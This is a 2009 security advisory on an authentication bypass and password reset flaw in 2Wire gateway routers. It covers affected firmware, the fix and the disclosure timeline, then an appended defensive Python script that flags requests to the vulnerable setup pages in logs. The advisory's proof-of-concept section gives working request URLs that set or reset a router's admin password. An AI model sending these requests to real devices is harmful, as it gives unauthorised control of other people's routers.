2WIRE Gateway Bypass / Reset

13 Aug 2009 | Reported by hkm | Type: packetstorm | Source: packetstormsecurity.com

2WIRE Gateway authentication bypass and password reset vulnerabilit

Code
`2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET  
====================================================  
  
  
DESCRIPTION  
-----------------  
There is an authentication bypass vulnerability in page=CD35_SETUP_01  
that allows you to set a new password even if the password was  
previously set.  
  
By setting a new password with more than 512 characters the password  
gets reset and next time you access the router you will be prompted for  
a new password.  
  
  
VULNERABLE  
----------------  
2Wire 2071 Gateway  
2Wire 1800HW  
2Wire 1701HG  
  
Firmware  
5.29.51  
3.17.5  
3.7.1  
  
NOT VULNERABLE  
--------------------  
Firmware  
5.29.135.5 or later  
  
  
DISCLOSURE TIMELINE  
-------------------------  
03/27/2009 - 2wire Contacted  
no satisfactory response  
07/11/2009 - Sent complete details to 2wire  
no response  
07/17/2009 - Sent advisory with video demo to 2wire  
ticket status escalated, but no response  
08/02/2009 - Made public @ Defcon 17  
  
  
EXPLOIT/POC  
-----------------  
Authentication Bypass - just use this page to set a new password  
  
http://gateway.2wire.net?xslt?page=CD35_SETUP_01  
  
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv  
  
  
Password Reset - using the same form but sending a password > 512  
characters  
  
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512*  
  
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv  
  
  
GREETS  
------------  
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf  
h4ckult1m4t3 hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam  
raza-mexicana roa Setting sla.ckers thornmaker tr3w vandida vi0let  
xianur0 Yield  
  
Comunidad Underground de Mexico : https://www.underground.org.mx  
  
  
h k m  
http://www.hakim.ws  
  
  
`
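
The following defensive triage example is added here and is not part of hkm's advisory. It labels logged HTTP request lines that reach the CD35_SETUP_01 pages, flags password parameters longer than 512 characters, and checks firmware strings against the fixed release. The request-line format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Values taken from the advisory text.
SETUP_PAGES = {"CD35_SETUP_01", "CD35_SETUP_01_POST"}
MAX_PASSWORD_LEN = 512
FIXED_FIRMWARE = (5, 29, 135, 5)

# Match on the raw line so unusual query layouts are still seen.
PAGE_RE = re.compile(r"[?&]page=([^&\s]+)", re.IGNORECASE)
PASSWORD_RE = re.compile(r"[?&]password[12]=([^&\s]*)", re.IGNORECASE)

def firmware_is_fixed(version):
    """True if a dotted numeric firmware string is at or above the fixed release."""
    parts = tuple(int(p) for p in version.strip().split("."))
    width = max(len(parts), len(FIXED_FIRMWARE))
    pad = lambda t: t + (0,) * (width - len(t))
    return pad(parts) >= pad(FIXED_FIRMWARE)

def classify_request(line):
    """Label one logged request line: None, 'setup-page' or 'oversized-password'."""
    pages = {p.upper() for p in PAGE_RE.findall(line)}
    if not pages & SETUP_PAGES:
        return None
    lengths = [len(unquote(v)) for v in PASSWORD_RE.findall(line)]
    if any(n > MAX_PASSWORD_LEN for n in lengths):
        return "oversized-password"
    return "setup-page"

def triage(log_lines):
    """Return (line_number, label) for every request that touches the setup page."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        label = classify_request(line)
        if label:
            hits.append((number, label))
    return hits

# Constructed sample request lines (not captured traffic).
SAMPLE_LOG = [
    "GET /xslt?page=EXAMPLE_HOME HTTP/1.1",
    "GET /xslt?page=CD35_SETUP_01 HTTP/1.1",
    "GET /xslt?PAGE=CD35_SETUP_01_POST&password1=" + "x" * 600
    + "&password2=" + "x" * 600 + " HTTP/1.1",
    "GET /xslt?PAGE=CD35_SETUP_01_POST&password1=short&password2=short HTTP/1.1",
]

if __name__ == "__main__":
    for number, label in triage(SAMPLE_LOG):
        print(number, label)
```

Passwords submitted in a POST body do not appear in request lines, so a `setup-page` label alone is worth reviewing on any device whose firmware fails `firmware_is_fixed`.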
